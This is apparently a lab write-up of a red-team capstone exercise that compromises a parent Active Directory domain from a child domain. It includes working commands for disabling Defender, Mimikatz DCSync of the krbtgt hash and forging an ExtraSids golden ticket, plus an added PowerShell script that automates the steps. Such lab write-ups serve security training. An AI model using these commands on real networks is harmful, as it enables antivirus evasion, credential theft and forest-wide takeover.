Full Compromise of Parent Domain

Used Tools

python webserver

powershell

mimikatz

Summary

From our attack machine, via the VPN server, we start a web server to deliver Mimikatz and the other tools to the corpdc domain controller, which we use as the stepping stone into the parent domain. First we disable the AV; then we unsuccessfully try to retrieve the parent domain's Administrator hash from rootdc with lsadump::dcsync, using our child-domain Domain Admin account in Mimikatz. Next we gather the information needed to craft a golden ticket that carries the Enterprise Admins SID of the parent domain as an extra SID, and use it to impersonate the Administrator. With that ticket we can reach the administrative shares of rootdc and place the flags for the full compromise of the parent domain. The next step, creating a user on rootdc with PsExec and SMBExec, is discussed in the next section.

Investigation

Running a python webserver on the attack machine to provide the tools to the network.

Downloading the tools to the VPN machine.

Running a Python webserver on the VPN machine to provide the corpdc with the tools we need.

First, we open a PowerShell as administrator on corpdc, disable real-time AV scanning with the following command, and fetch Mimikatz from the VPN server. Note that this is a noisy step: Defender logs the change (event 5001 in the Windows Defender operational log) and it is blocked outright when Tamper Protection is enabled.

Set-MpPreference -DisableRealtimeMonitoring $true

Next, we run Mimikatz, check our privileges and try to DCSync the Administrator account of the parent domain from rootdc. This fails: the error reported is that the user name is not unique. A plain "Administrator" is ambiguous here because the child domain and the parent domain each have their own Administrator account, and in any case a Domain Admin of corp.thereserve.loc does not hold the replication rights (DS-Replication-Get-Changes / -All) on the parent domain's naming context that DCSync requires.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator

To remove the ambiguity we look up the SID of the parent domain's Administrator (RID 500) on rootdc and repeat the DCSync with that SID instead of the name.

Again we get an error and no hash, which is consistent with the missing replication rights rather than with a name lookup problem.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500

Since DCSync is not possible with the rights we hold, we instead craft a golden ticket for the child domain that carries the parent domain's Enterprise Admins SID as an extra SID. This works because SID filtering is not enforced on the parent/child trust within a forest, so the parent domain honours the extra SID and treats us as an Enterprise Admin.

The following information has to be gathered to craft the golden ticket.

See also https://tryhackme.com/room/exploitingad Exploiting Domain Trust

  • The FQDN of the child domain we are in

    • corp.thereserve.loc

  • The SID of the child domain, which the forged TGT claims to be issued for. Following the room's guidance we take it from the CORPDC computer account; note that the domain SID proper is this value without the trailing RID (-1009), since kerberos::golden appends the /id RID (500 by default) to whatever is passed as /sid

    • S-1-5-21-170228521-1485475711-3199862024-1009

    Get SID of CORPDC

    PS C:\Windows\system32> Get-ADComputer -Identity "CORPDC"

  • The SID of the Enterprise Admins group in the parent domain (well-known RID 519), which we add as an extra SID to the forged TGT. The group only exists in the forest root, so the query is sent to rootdc

    • S-1-5-21-1255581842-1300659601-3764024703-519

    Get SID of Enterprise Admins from ROOTDC

    PS C:\Windows\system32> Get-ADGroup -Identity "Enterprise Admins" -Server rootdc.thereserve.loc

  • The username of the account we want to impersonate

    • Administrator

  • The NT hash of the child domain's KRBTGT account, which encrypts and signs the forged TGT

    • 0c757a3445acb94a654554f3ac529ede

    mimikatz # lsadump::dcsync /user:corp\krbtgt

The reference command from https://tryhackme.com/room/exploitingad:

kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt

With that information, we are able to craft a golden ticket and impersonate the administrator.

kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt

With the ticket injected into our session by /ptt, we can reach the administrative shares of rootdc.
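The information-gathering steps above and the assembly of the kerberos::golden line, as an added PowerShell example that is not part of the original write-up or the TryHackMe room. It assumes the ActiveDirectory module (RSAT) is present on CORPDC, that the session runs as a corp.thereserve.loc Domain Admin, and that the krbtgt hash is the one obtained from the DCSync above. Unlike the command above, it passes the child domain's own SID (as returned by Get-ADDomain, without a trailing RID) to /sid, which is what that parameter is documented to take, and it checks that the Enterprise Admins SID fetched from rootdc ends in the well-known RID 519. After the ticket has been injected in Mimikatz, the last two lines verify that it is in the cache and that the parent DC's admin share answers.

```powershell
# Added example (not from the original write-up): collect golden-ticket inputs
# on CORPDC, build the Mimikatz command, and verify the injected ticket.
Import-Module ActiveDirectory

$childDomain = 'corp.thereserve.loc'
$parentDc    = 'rootdc.thereserve.loc'
# NT hash of corp\krbtgt, taken from: lsadump::dcsync /user:corp\krbtgt
$krbtgtRc4   = '0c757a3445acb94a654554f3ac529ede'

# Domain SID of the child domain. Get-ADDomain returns it without a RID, which is
# what kerberos::golden /sid expects (Mimikatz appends /id, default 500, itself).
$childSid = (Get-ADDomain -Identity $childDomain).DomainSID.Value

# The same value can be derived from any principal SID in the child domain by
# dropping the last RID; here from the CORPDC computer account used in the room.
$corpdcSid = (Get-ADComputer -Identity 'CORPDC').SID.Value
$derived   = $corpdcSid.Substring(0, $corpdcSid.LastIndexOf('-'))
if ($derived -ne $childSid) { Write-Warning "Domain SID mismatch: $derived vs $childSid" }

# Enterprise Admins exists only in the forest root, so ask the parent DC for it
# and confirm the well-known RID 519 before trusting the value.
$eaSid = (Get-ADGroup -Identity 'Enterprise Admins' -Server $parentDc).SID.Value
if (-not $eaSid.EndsWith('-519')) { Write-Warning "Unexpected Enterprise Admins SID: $eaSid" }

# Assemble the Mimikatz line; /sids carries the parent EA SID as ExtraSids in the PAC.
$golden = "kerberos::golden /user:Administrator /domain:$childDomain /sid:$childSid " +
          "/service:krbtgt /rc4:$krbtgtRc4 /sids:$eaSid /ptt"
Write-Output "Run in mimikatz:`n$golden"

# After /ptt in Mimikatz: the forged TGT should show up in the ticket cache, and
# the parent DC's admin share should now be readable with it.
klist | Select-String 'krbtgt'
Get-ChildItem "\\$parentDc\c$\Windows\Temp" -ErrorAction Stop | Select-Object -First 5
```

If the share listing still fails after /ptt, run klist purge, inject the ticket again and retry; a stale TGT for the real corp Administrator in the cache is the usual cause.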

There we place our proof of compromise in the given folders. Creating a new user on rootdc and adding it to Domain Admins and Enterprise Admins would logically belong to this section, but since it is also part of compromising the BANK domain, it is discussed in the next section for a clearer structure.

Flag-15: Foothold on Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-16: Administrative access to Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Users\Administrator\0xb0b.txt
